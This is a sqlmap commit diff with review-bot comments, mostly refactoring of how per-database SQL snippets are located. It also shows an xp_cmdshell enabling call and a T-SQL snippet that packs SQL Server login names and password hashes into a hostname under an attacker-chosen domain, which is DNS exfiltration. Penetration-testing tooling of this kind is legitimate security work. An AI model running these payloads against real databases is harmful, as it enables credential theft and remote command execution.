minor update and refactoring

Miroslav Stampar 2012-02-15 14:05:50 +00:00
parent bf923a97df
commit 8d7912ad34
5 changed files with 21 additions and 5 deletions


@ -61,6 +61,7 @@ from lib.core.convert import unicodeencode
from lib.core.convert import urldecode from lib.core.convert import urldecode
from lib.core.convert import urlencode from lib.core.convert import urlencode
from lib.core.enums import DBMS from lib.core.enums import DBMS
from lib.core.enums import DBMS_DIRECTORY_NAME
from lib.core.enums import HTTPHEADER from lib.core.enums import HTTPHEADER
from lib.core.enums import HTTPMETHOD from lib.core.enums import HTTPMETHOD
from lib.core.enums import OS from lib.core.enums import OS
@ -1807,12 +1808,14 @@ def parseXmlFile(xmlFile, handler):
parse(stream, handler) parse(stream, handler)
stream.close() stream.close()
def getSPLSnippet(name, **variables): def getSPLSnippet(dbms, name, **variables):
""" """
Returns content of SPL snippet located inside "procs" directory Returns content of SPL snippet located inside "procs" directory
""" """
filename = os.path.join(paths.SQLMAP_PROCS_PATH, "%s.txt" % name) _ = { DBMS.MSSQL: DBMS_DIRECTORY_NAME.MSSQL, DBMS.PGSQL: DBMS_DIRECTORY_NAME.PGSQL }
filename = os.path.join(paths.SQLMAP_PROCS_PATH, _[dbms], "%s.txt" % name)
checkFile(filename) checkFile(filename)
retVal = readCachedFileContent(filename) retVal = readCachedFileContent(filename)
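Review bot: The lookup `_[dbms]` in getSPLSnippet raises a bare KeyError for every DBMS other than MSSQL and PGSQL, because the local dict maps only those two values even though DBMS_DIRECTORY_NAME in this commit defines a directory name for ten back-ends. A caller that was not updated for the new leading `dbms` parameter would pass the snippet name in that position and hit the same unexplained KeyError. I would resolve the directory with `dirname = _.get(dbms)` and raise a descriptive error when it is `None`, and give the dict a readable name instead of `_`. The docstring still describes a file located directly inside "procs"; it should mention the per-DBMS subdirectory and the `dbms` argument. The function body continues past the end of the hunk.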


@ -26,6 +26,7 @@ class SORT_ORDER:
class DBMS: class DBMS:
ACCESS = "Microsoft Access" ACCESS = "Microsoft Access"
DB2 = "IBM DB2"
FIREBIRD = "Firebird" FIREBIRD = "Firebird"
MAXDB = "SAP MaxDB" MAXDB = "SAP MaxDB"
MSSQL = "Microsoft SQL Server" MSSQL = "Microsoft SQL Server"
@ -34,7 +35,18 @@ class DBMS:
PGSQL = "PostgreSQL" PGSQL = "PostgreSQL"
SQLITE = "SQLite" SQLITE = "SQLite"
SYBASE = "Sybase" SYBASE = "Sybase"
DB2 = "IBM DB2"
class DBMS_DIRECTORY_NAME:
ACCESS = "access"
DB2 = "db2"
FIREBIRD = "firebird"
MAXDB = "maxdb"
MSSQL = "mssqlserver"
MYSQL = "mysql"
ORACLE = "oracle"
PGSQL = "postgresql"
SQLITE = "sqlite"
SYBASE = "sybase"
class CUSTOM_LOGGING: class CUSTOM_LOGGING:
PAYLOAD = 9 PAYLOAD = 9
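Review bot: DBMS_DIRECTORY_NAME is added without any comment saying what its values are for or that they have to be kept in step with DBMS by hand. A line above the class such as `# Per-DBMS directory names used when building resource paths; keep one entry per DBMS member` would make that explicit. Elsewhere in this commit the values are joined onto the procs path in getSPLSnippet, so a mistyped or missing entry here would presumably only surface at run time, when the snippet file is looked up.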


@ -17,6 +17,7 @@ from lib.core.data import conf
from lib.core.data import kb from lib.core.data import kb
from lib.core.data import logger from lib.core.data import logger
from lib.core.data import paths from lib.core.data import paths
from lib.core.enums import DBMS
from lib.core.exception import sqlmapUnsupportedFeatureException from lib.core.exception import sqlmapUnsupportedFeatureException
from lib.core.session import setXpCmdshellAvailability from lib.core.session import setXpCmdshellAvailability
from lib.core.unescaper import unescaper from lib.core.unescaper import unescaper
@ -63,7 +64,7 @@ class xp_cmdshell:
debugMsg += "stored procedure" debugMsg += "stored procedure"
logger.debug(debugMsg) logger.debug(debugMsg)
cmd = getSPLSnippet("configure_xp_cmdshell", ENABLE=str(mode)) cmd = getSPLSnippet(DBMS.MSSQL, "configure_xp_cmdshell", ENABLE=str(mode))
return cmd return cmd


@ -1,4 +1,4 @@
# Reference: http://www.defcon.org/images/defcon-17/dc-17-presentations/defcon-17-joseph_mccray-adv_sql_injection.pdf # Reference: http://www.defcon.org/images/defcon-15/dc15-presentations/dc-15-karlsson.pdf
DECLARE @host varchar(1024); DECLARE @host varchar(1024);
SELECT @host = name + '-' + master.sys.fn_varbintohexstr(password_hash) + '.%DOMAIN%' FROM sys.sql_logins; SELECT @host = name + '-' + master.sys.fn_varbintohexstr(password_hash) + '.%DOMAIN%' FROM sys.sql_logins;